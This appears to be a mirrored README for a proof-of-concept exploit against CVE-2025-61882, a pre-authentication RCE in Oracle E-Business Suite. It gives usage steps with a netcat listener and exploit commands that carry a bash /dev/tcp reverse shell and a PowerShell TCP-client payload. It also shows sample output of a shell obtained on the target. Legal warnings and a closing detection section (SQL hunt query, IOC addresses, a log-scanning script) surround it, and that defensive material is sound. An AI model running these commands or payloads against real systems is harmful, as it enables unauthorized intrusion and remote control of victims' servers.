Related vulnerabilities

Description
POC of CVE-2025-61882

Introduction
# CVE-2025-61882 Security Testing Tool
## 🚨 CRITICAL LEGAL WARNING
See our [blog post](https://blog.intelligencex.org/cve-2025-61882-oracle-zero-day-exploit-analysis) for technical details.

**THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY**
```
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨   ║
║                                                              ║
║  By using this tool, you acknowledge and agree that:        ║
║                                                              ║
║  ✓ You have WRITTEN AUTHORIZATION to test the target        ║
║  ✓ You accept FULL LEGAL RESPONSIBILITY for your actions    ║
║  ✓ You will COMPLY with all applicable laws                 ║
║  ✓ Unauthorized use may result in IMPRISONMENT              ║
║                                                              ║
║  If you DO NOT have authorization: EXIT NOW                 ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝
```
**Penalties for unauthorized use include:**
- Criminal prosecution under CFAA (US), Computer Misuse Act (UK), and equivalent laws
- Civil lawsuits for damages
- Substantial fines (up to $250,000+ in the US)
- Imprisonment (up to 10+ years depending on jurisdiction)
- Permanent criminal record
---
## 📋 Overview
Security testing tool for **CVE-2025-61882**, a critical pre-authentication remote code execution vulnerability affecting Oracle E-Business Suite.
**Created by:** Mindflare  
**Purpose:** Authorized security testing and vulnerability validation  
**Blog:** [Read the full technical analysis](#)
### Vulnerability Details
- **CVE ID:** CVE-2025-61882
- **CVSS Score:** 9.8 (Critical)
- **Attack Vector:** Network (Unauthenticated)
- **Attack Complexity:** Medium
- **Privileges Required:** None
- **User Interaction:** None
- **Affected Versions:** Oracle E-Business Suite 12.2.3 - 12.2.14
- **Patch Status:** Emergency patch released October 4, 2025
- **Exploitation Status:** ⚠️ **ACTIVELY EXPLOITED** by Cl0p ransomware since August 2025
### Technical Summary
CVE-2025-61882 is a sophisticated exploit chain combining five distinct vulnerabilities:
1. **SSRF** - Server-Side Request Forgery via `/OA_HTML/configurator/UiServlet`
2. **CRLF Injection** - HTTP header injection in `return_url` parameter
3. **HTTP Smuggling** - Keep-alive connection abuse to reach internal services (port 7201)
4. **Authentication Bypass** - Path traversal via `/OA_HTML/help/../` prefix
5. **XSLT Injection** - Malicious XSL template processing leads to RCE
---
## 🎯 Intended Use Cases
### ✅ Acceptable Use
- Authorized penetration testing with written permission
- Security research on systems you own
- Vulnerability validation in controlled lab environments
- Red team exercises with proper scope documentation
- Academic research with institutional approval
- Incident response and forensic analysis
### ❌ Prohibited Use
- Any unauthorized system access
- Testing systems without explicit written permission
- Malicious activities or causing harm
- Attacking production systems without approval
- Using for criminal purposes
- Any activity violating applicable laws
---
## 📦 Installation
### Prerequisites
- Python 3.7 or higher
- pip package manager
- Network connectivity to target (authorized only)
- Netcat or similar listener for receiving reverse shell
### Setup
```bash
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC
# Install dependencies
pip3 install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py
```
---
## 🚀 Usage
### Step 1: Set Up Your Listener
In a **separate terminal**, start a netcat listener:
```bash
# Linux/Mac
nc -lvnp 4444
# Windows
nc.exe -lvnp 4444
```
### Step 2: Run the Tool
**Basic Usage (Linux Target):**
```bash
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux
```
**Windows Target:**
```bash
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows
```
### Parameters
| Parameter | Description | Required | Example |
|-----------|-------------|----------|---------|
| `--target` | Target Oracle EBS URL | **Yes** | `http://192.168.1.22:8000` |
| `--lhost` | Your IP address (for callbacks) | **Yes** | `192.168.1.10` |
| `--lport` | HTTP server port (serves XSL payload) | **Yes** | `80` or `8080` |
| `--command` | Command to execute on target | **Yes** | See examples above |
| `--platform` | Target OS: `linux` or `windows` | **Yes** | `linux` |
---
## 📊 Example Output
### Tool Output
```
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux
[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully
[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
```
### Netcat Listener Output (If Vulnerable)
```bash
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
```
---
## 🛡️ Detection & Defense
### For Security Defenders
#### Immediate Actions
1. **Apply Oracle Emergency Patch** (Document ID: 30061882.1)
2. **Hunt for Compromise:**
   ```sql
   SELECT * FROM XDO_TEMPLATES_B 
   WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
   ```
3. **Review Access Logs** since August 2025
4. **Block outbound internet** from EBS servers
#### Detection Indicators
**Network IOCs:**
```
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)
```
**HTTP Patterns:**
- `POST /OA_HTML/configurator/UiServlet`
- `POST /OA_HTML/SyncServlet`
- `GET /OA_HTML/help/../*.jsp`
- CRLF characters in parameters
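
The HTTP patterns above, expressed as a check over web access logs. This is an added example, not part of the original repository; it assumes common/combined log format, the sample log lines are constructed, and it also matches percent-encoded forms of `../` and CR/LF, which goes slightly beyond the literal patterns listed.

```python
import re
from urllib.parse import unquote

# Common/combined log format: only the quoted request line is needed.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# (indicator, method, regex on the percent-decoded path), from the list above.
PATH_RULES = [
    ("UiServlet POST", "POST",
     re.compile(r"^/OA_HTML/configurator/UiServlet(?:;|$)", re.I)),
    ("SyncServlet POST", "POST",
     re.compile(r"^/OA_HTML/SyncServlet(?:;|$)", re.I)),
    ("help traversal to JSP", "GET",
     re.compile(r"^/OA_HTML/help/\.\./.*\.jsp(?:;|$)", re.I)),
]

# Percent-encoded CR or LF in the query string, single- or double-encoded.
CRLF = re.compile(r"%(?:25)?0[da]", re.I)

# Constructed sample lines (documentation addresses, placeholder JSP name).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2025:10:00:00 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Oct/2025:10:00:01 +0000] "GET /OA_HTML/help/%2e%2e/example.jsp HTTP/1.1" 200 90',
    '192.0.2.11 - - [01/Oct/2025:10:00:02 +0000] "GET /OA_HTML/AppsLogin?x=a%0d%0ab HTTP/1.1" 302 0',
    '192.0.2.12 - - [01/Oct/2025:10:00:03 +0000] "GET /OA_HTML/help/index.jsp HTTP/1.1" 200 700',
]

def classify(line):
    """Return the indicator names matched by one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    path, _, query = m.group("target").partition("?")
    decoded = unquote(path)  # so %2e%2e is seen as ..
    hits = [name for name, method, rx in PATH_RULES
            if m.group("method") == method and rx.search(decoded)]
    if CRLF.search(query):
        hits.append("CRLF in parameters")
    return hits

def scan(lines):
    """Return (line_number, indicators, line) for every line with a hit."""
    return [(n, hits, line) for n, line in enumerate(lines, 1)
            if (hits := classify(line))]

if __name__ == "__main__":
    for n, hits, _ in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Access logs record the request line only, so CRLF sequences carried in a POST body will not appear here; check WAF or reverse-proxy logs that capture bodies for those.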
---
## 📚 References
- [Oracle Security Alert Advisory](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html)
- [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- [Google/Mandiant Analysis](https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation)
- [watchTowr Labs Research](https://labs.watchtowr.com/)
---
## 📜 License
MIT License with Educational Use Restrictions - See [LICENSE](LICENSE)
**DISCLAIMER:** This software is for authorized security testing only. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.
---
## 🔐 Final Warning
```
╔══════════════════════════════════════════════════════════════╗
║           WITH GREAT POWER COMES GREAT RESPONSIBILITY        ║
║                                                              ║
║        🔒 Stay Legal. Stay Ethical. Stay Professional. 🔒   ║
╚══════════════════════════════════════════════════════════════╝
```
**Created by:** Mindflare | **Last Updated:** October 2025
        
File snapshot

 [4.0K]  /data/pocs/b44c677f98bbc893a9ac05d86ba357970a963179
├── [ 14K]  cve-2025-61882-detector.py
├── [2.5K]  LICENSE
├── [8.3K]  README.md
└── [  32]  requirements.txt
0 directories, 4 files
                
             
         